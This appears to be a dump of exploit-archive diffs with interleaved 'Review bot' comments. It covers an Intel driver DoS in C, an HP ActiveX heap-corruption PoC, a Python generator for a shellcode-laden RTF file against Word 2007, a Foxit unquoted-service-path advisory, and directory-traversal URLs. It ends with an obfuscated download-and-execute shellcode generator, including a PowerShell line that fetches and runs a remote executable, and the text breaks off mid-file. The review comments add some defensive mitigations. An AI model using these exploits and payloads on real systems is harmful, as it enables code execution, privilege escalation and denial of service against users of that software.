[10] IRP_MJ_SHUTDOWN fffff800036b0e30 nt!IopInvalidDeviceRequest
[11] IRP_MJ_LOCK_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest
[12] IRP_MJ_CLEANUP fffff800036b0e30 nt!IopInvalidDeviceRequest
[13] IRP_MJ_CREATE_MAILSLOT fffff800036b0e30 nt!IopInvalidDeviceRequest
[14] IRP_MJ_QUERY_SECURITY fffff800036b0e30 nt!IopInvalidDeviceRequest
[15] IRP_MJ_SET_SECURITY fffff800036b0e30 nt!IopInvalidDeviceRequest
[16] IRP_MJ_POWER fffff800036b0e30 nt!IopInvalidDeviceRequest
[17] IRP_MJ_SYSTEM_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest
[18] IRP_MJ_DEVICE_CHANGE fffff800036b0e30 nt!IopInvalidDeviceRequest
[19] IRP_MJ_QUERY_QUOTA fffff800036b0e30 nt!IopInvalidDeviceRequest
[1a] IRP_MJ_SET_QUOTA fffff800036b0e30 nt!IopInvalidDeviceRequest
[1b] IRP_MJ_PNP fffff800036b0e30 nt!IopInvalidDeviceRequest
*/
#include <windows.h>
#include <stdio.h>
#include <conio.h>
int main(int argc, char **argv)
{
HANDLE hDevice;
DWORD bret;
char szDevice[] = "\\\\.\\Nal";
printf("--[ Intel Network Adapter Diagnostic Driver DoS ]--\n");
printf("Opening handle to driver..\n");
// CreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDispoition, dwFlagsAndAttributes, hTemplateFile)
if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {
printf("Device %s succesfully opened!\n", szDevice);
printf("\tHandle: %p\n", hDevice);
}
else
{
printf("Error: Error opening device %s\n", szDevice);
}
printf("\nPress any key to DoS..");
_getch();
bret = 0;
// Affected IOCTL codes: 0x80862013, 0x8086200B, 0x8086200F, 0x80862007
// DeviceIoControl(hDevice, dwIoControlCode, lpInBuffer, nInBufferSize, lpOutBuffer, nOutBufferSize, lpBytesReturned, lpOverlapped)
if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))
{
printf("DeviceIoControl Error - bytes returned %#x\n", bret);
}
CloseHandle(hDevice);
return 0;
}
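Review bot: the `else` branch after `CreateFileA` only prints `Error: Error opening device` and then falls through, so `_getch()` and `DeviceIoControl` still run against `INVALID_HANDLE_VALUE`; return non-zero there so a failed open is never read as "the driver survived the IOCTL". Two typos in the same block: `succesfully` and `dwCreationDispoition`. The `!devobj` output above shows the `Nal` device with `DOE_DEFAULT_SD_PRESENT`, but the write-up never states which account or integrity level opened the handle to `\\.\Nal`; recording that is what lets a reader judge whether this is a standard-user DoS or needs administrative rights, and it is the first thing a defender checks when prioritising the driver update.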


@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/50895/info
HP Device Access Manager for HP ProtectTools is prone to a remote heap-memory-corruption vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
HP Device Access Manager for HP ProtectTools versions prior to 6.1.0.1 are vulnerable.
<HTML>
<BODY>
<object id="target"
classid="clsid:{1A6F1F9C-7986-4CAB-BD5E-0E0BC09DEE8B}"></object>
<SCRIPT language="JavaScript">
function Do_It()
{
arg1=String(1044, "X")
target.AddUser arg1
}
</SCRIPT>
<input onclick="Do_It()" type="button" value="P0c">
</BODY>
</HTML>
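Review bot: the `<SCRIPT language="JavaScript">` block mixes two languages: `String(1044, "X")` and the parenthesis-free call `target.AddUser arg1` are VBScript, while `function Do_It() { ... }` is JavaScript, so the handler is a syntax error in both and the button does nothing as written; pick one language and label the block accordingly. The advisory names the fixed version (6.1.0.1) but gives no interim mitigation; since the PoC instantiates the control from a web page, the standard stop-gap is the Internet Explorer kill bit for CLSID `{1A6F1F9C-7986-4CAB-BD5E-0E0BC09DEE8B}`, which is worth stating next to the version line.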


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50906/info
Serv-U is prone to a denial-of-service vulnerability and a security-bypass vulnerability.
Attackers can exploit these issues to perform denial-of-service attacks or gain unauthorized access to the affected application.
Serv-U 11.1.0.3 and prior versions are vulnerable.
http://www.exploit-db.com/sploits/36405.zip

File diff suppressed because one or more lines are too long

platforms/windows/local/36207.py Executable file

@ -0,0 +1,141 @@
# Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass
# Date : 28/02/2015
# Author : R-73eN
# Software : Microsoft Office Word 2007
# Tested : Windows 7 Starter
import sys
# Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode .
shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7'
#filecontent
content="{\\rtf1"
content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}"
content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par"
content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par"
content+="{\\object\\objocx"
content+="{\\*\\objdata"
content+="\n"
content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000"
content+="00000000000000000E0000"
content+="\n"
content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000"
content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF"
content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400"
content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000"
content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628"
content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00"
content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000"
content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF"
content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000"
content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF"
content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000"
content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000"
content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000"
content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400"
content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600"
content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080"
content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974"
content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000"
content+="000000000000"
content+= 'cb818278'# Address=788281CB jmp esp | {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll)
content+="9090909090909090" #nops
content+= shellcode
#junk
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000"
content+="\n"
content+="}"
content+="}"
content+="}"
banner = "\n\n"
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_|[] /_/ \_\_____|\n\n"
print banner
if(len(sys.argv) < 2):
print '\n Usage : exploit.py filename.rtf'
else:
filename = sys.argv[1]
f=open(filename,"w")
f.write(content)
f.close()
print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'
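Review bot: the header claims an "ASLR and DEP bypass", but the chain is `jmp esp` (the `cb818278` address in non-ASLR msxml5.dll 5.20.1072.0) into `9090909090909090` and the message-box shellcode, which only runs if the memory esp points into is executable, i.e. where DEP is not enforced for WINWORD.EXE; the pinned msxml5.dll covers the ASLR half only, so either state the DEP configuration of the "Windows 7 Starter" test box or drop "DEP bypass" from the title. Defenders reading this should note that enforcing DEP for Office, or forcing ASLR on the pinned msxml5.dll build, breaks this exact chain. Minor: `print banner` and the other bare `print` statements are Python 2 syntax and fail with SyntaxError on Python 3 before any file is written.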


@ -0,0 +1,55 @@
?
Foxit Reader 7.0.6.1126 Unquoted Service Path Elevation Of Privilege
Vendor: Foxit Software Incorporated
Product web page: http://www.foxitsoftware.com
Affected version: 7.0.6.1126 and 6.1
Summary: Foxit Reader is a small, lightning fast, and feature rich PDF
viewer which allows you to create (free PDF creation), open, view, sign,
and print any PDF file.
Desc: The application suffers from an unquoted search path issue impacting
the service 'FoxitCloudUpdateService' for Windows deployed as part of Foxit
Reader. This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. A
successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local users code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Aljaz Ceru
aljaz@insec.si
Advisory ID: ZSL-2015-5235
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5235.php
Vendor: http://www.foxitsoftware.com/support/security_bulletins.php#FRD-25
17.02.2015
--
C:\Users\user>sc qc FoxitCloudUpdateService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FoxitCloudUpdateService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Foxit Cloud Safe Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>
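Review bot: the hunk stops at the `sc qc` output and never states the remediation, so add it after `SERVICE_START_NAME : LocalSystem`: until the vendor build is installed, quote the image path, e.g. `sc config FoxitCloudUpdateService binPath= "\"C:\Program Files\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe\""`, and for detection across a fleet list services whose path contains a space and does not start with a quote (`wmic service get name,pathname,startmode`, or `Get-CimInstance Win32_Service | Select-Object Name,PathName` in PowerShell). Two consistency points: `Affected version: 7.0.6.1126 and 6.1` while the title names only 7.0.6.1126, and `the local users code` should read `the local user's code`.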


@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/50845/info
Oxide WebServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks.
http://www.example.com/..\..\..\boot.ini
http://www.example.com/..\\..\\..\\boot.ini
http://www.example.com/..\/..\/..\/boot.ini
http://www.example.com//..\/..\/..\boot.ini
http://www.example.com/.\..\.\..\.\..\boot.ini
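Review bot: the five PoC URLs differ only in the separator (`..\`, `..\\`, `..\/`, `.\..\`), but the text does not say which of them the server actually accepted or which Oxide version was tested, so a reader cannot tell a missing-backslash-normalisation bug from a general canonicalisation failure; record the tested version and the variant(s) that worked. The list does make the defensive point well: a filter that only rejects the literal `../` misses every entry here, so the check has to canonicalise first (treat `\` as `/`, collapse `.` and `..` segments) and then verify that the resolved path is still under the web root, rather than pattern-match the raw request.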


@ -0,0 +1,314 @@
#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator
#length: Dynamic ! depend on url and filename
#Date: 20 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x64 ultimate
#WinExec => 0x77b1e695
#ExitProcess => 0x77ae2acf
#====================================
#Execute :
#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe"
#====================================
#Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
####################################################
#How it work ?
'''
C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py"
Enter url
Example: http://z3r0d4y.com/file.exe
Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe
Enter filename
Example: D:\file.exe
Enter:C:\Ali.exe
C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o
C:\Users\Ali\Desktop>objdump -D shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: 68 41 41 65 22 push $0x22654141
8: 58 pop %eax
9: c1 e8 08 shr $0x8,%eax
c: c1 e8 08 shr $0x8,%eax
f: 50 push %eax
10: b8 34 47 0b 4d mov $0x4d0b4734,%eax
15: bb 5d 69 6e 35 mov $0x356e695d,%ebx
1a: 31 d8 xor %ebx,%eax
1c: 50 push %eax
1d: b8 43 32 10 22 mov $0x22103243,%eax
22: bb 79 6e 51 4e mov $0x4e516e79,%ebx
27: 31 d8 xor %ebx,%eax
29: 50 push %eax
2a: b8 60 05 42 32 mov $0x32420560,%eax
2f: bb 49 78 79 71 mov $0x71797849,%ebx
34: 31 d8 xor %ebx,%eax
36: 50 push %eax
37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax
3c: bb 6a 64 49 33 mov $0x3349646a,%ebx
41: 31 d8 xor %ebx,%eax
43: 50 push %eax
44: b8 07 3e 0b 40 mov $0x400b3e07,%eax
49: bb 46 52 62 6e mov $0x6e625246,%ebx
4e: 31 d8 xor %ebx,%eax
50: 50 push %eax
51: b8 44 0a 78 07 mov $0x7780a44,%eax
56: bb 63 49 42 5b mov $0x5b424963,%ebx
5b: 31 d8 xor %ebx,%eax
5d: 50 push %eax
5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax
63: bb 6a 31 67 2d mov $0x2d67316a,%ebx
68: 31 d8 xor %ebx,%eax
6a: 50 push %eax
6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax
70: bb 61 4c 39 67 mov $0x67394c61,%ebx
75: 31 d8 xor %ebx,%eax
77: 50 push %eax
78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax
7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx
82: 31 d8 xor %ebx,%eax
84: 50 push %eax
85: b8 45 40 41 66 mov $0x66414045,%eax
8a: bb 3d 78 77 49 mov $0x4977783d,%ebx
8f: 31 d8 xor %ebx,%eax
91: 50 push %eax
92: b8 02 1f 4b 45 mov $0x454b1f02,%eax
97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx
9c: 31 d8 xor %ebx,%eax
9e: 50 push %eax
9f: b8 24 3e 19 32 mov $0x32193e24,%eax
a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx
a9: 31 d8 xor %ebx,%eax
ab: 50 push %eax
ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax
b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx
b6: 31 d8 xor %ebx,%eax
b8: 50 push %eax
b9: b8 1f 37 40 24 mov $0x2440371f,%eax
be: bb 6d 52 32 41 mov $0x4132526d,%ebx
c3: 31 d8 xor %ebx,%eax
c5: 50 push %eax
c6: b8 2e 35 68 31 mov $0x3168352e,%eax
cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx
d0: 31 d8 xor %ebx,%eax
d2: 50 push %eax
d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax
d8: bb 67 6e 69 61 mov $0x61696e67,%ebx
dd: 31 d8 xor %ebx,%eax
df: 50 push %eax
e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax
e5: bb 4f 45 62 33 mov $0x3362454f,%ebx
ea: 31 d8 xor %ebx,%eax
ec: 50 push %eax
ed: b8 20 57 1d 45 mov $0x451d5720,%eax
f2: bb 47 78 63 36 mov $0x36637847,%ebx
f7: 31 d8 xor %ebx,%eax
f9: 50 push %eax
fa: b8 04 6a 24 3b mov $0x3b246a04,%eax
ff: bb 77 44 4b 49 mov $0x494b4477,%ebx
104: 31 d8 xor %ebx,%eax
106: 50 push %eax
107: b8 18 0f 0a 32 mov $0x320a0f18,%eax
10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx
111: 31 d8 xor %ebx,%eax
113: 50 push %eax
114: b8 7d 18 3c 27 mov $0x273c187d,%eax
119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx
11e: 31 d8 xor %ebx,%eax
120: 50 push %eax
121: b8 03 44 60 60 mov $0x60604403,%eax
126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx
12b: 31 d8 xor %ebx,%eax
12d: 50 push %eax
12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax
133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx
138: 31 d8 xor %ebx,%eax
13a: 50 push %eax
13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax
140: bb 6c 37 47 45 mov $0x4547376c,%ebx
145: 31 d8 xor %ebx,%eax
147: 50 push %eax
148: b8 59 07 12 0e mov $0xe120759,%eax
14d: bb 35 68 73 6a mov $0x6a736835,%ebx
152: 31 d8 xor %ebx,%eax
154: 50 push %eax
155: b8 01 59 11 2c mov $0x2c115901,%eax
15a: bb 45 36 66 42 mov $0x42663645,%ebx
15f: 31 d8 xor %ebx,%eax
161: 50 push %eax
162: b8 22 22 4e 5a mov $0x5a4e2222,%eax
167: bb 4c 56 67 74 mov $0x7467564c,%ebx
16c: 31 d8 xor %ebx,%eax
16e: 50 push %eax
16f: b8 00 37 1b 48 mov $0x481b3700,%eax
174: bb 43 5b 72 2d mov $0x2d725b43,%ebx
179: 31 d8 xor %ebx,%eax
17b: 50 push %eax
17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax
181: bb 64 48 47 71 mov $0x71474864,%ebx
186: 31 d8 xor %ebx,%eax
188: 50 push %eax
189: b8 6a 23 03 18 mov $0x1803236a,%eax
18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx
193: 31 d8 xor %ebx,%eax
195: 50 push %eax
196: b8 2d 54 57 1c mov $0x1c57542d,%eax
19b: bb 47 31 34 68 mov $0x68343147,%ebx
1a0: 31 d8 xor %ebx,%eax
1a2: 50 push %eax
1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax
1a8: bb 39 38 79 38 mov $0x38793839,%ebx
1ad: 31 d8 xor %ebx,%eax
1af: 50 push %eax
1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax
1b5: bb 79 57 51 61 mov $0x61515779,%ebx
1ba: 31 d8 xor %ebx,%eax
1bc: 50 push %eax
1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax
1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx
1c7: 31 d8 xor %ebx,%eax
1c9: 50 push %eax
1ca: b8 2c 18 08 54 mov $0x5408182c,%eax
1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx
1d4: 31 d8 xor %ebx,%eax
1d6: 50 push %eax
1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax
1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx
1e1: 31 d8 xor %ebx,%eax
1e3: 50 push %eax
1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax
1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx
1ee: 31 d8 xor %ebx,%eax
1f0: 50 push %eax
1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax
1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx
1fb: 31 d8 xor %ebx,%eax
1fd: 50 push %eax
1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax
203: bb 39 44 61 4f mov $0x4f614439,%ebx
208: 31 d8 xor %ebx,%eax
20a: 50 push %eax
20b: 89 e0 mov %esp,%eax
20d: bb 41 41 41 01 mov $0x1414141,%ebx
212: c1 eb 08 shr $0x8,%ebx
215: c1 eb 08 shr $0x8,%ebx
218: c1 eb 08 shr $0x8,%ebx
21b: 53 push %ebx
21c: 50 push %eax
21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx
222: ff d3 call *%ebx
224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx
229: ff d3 call *%ebx
C:\Users\Ali\Desktop>
#you have your shellcode now
=======================================
shellcode.c
#include <stdio.h>
#include <string.h>
int main(){
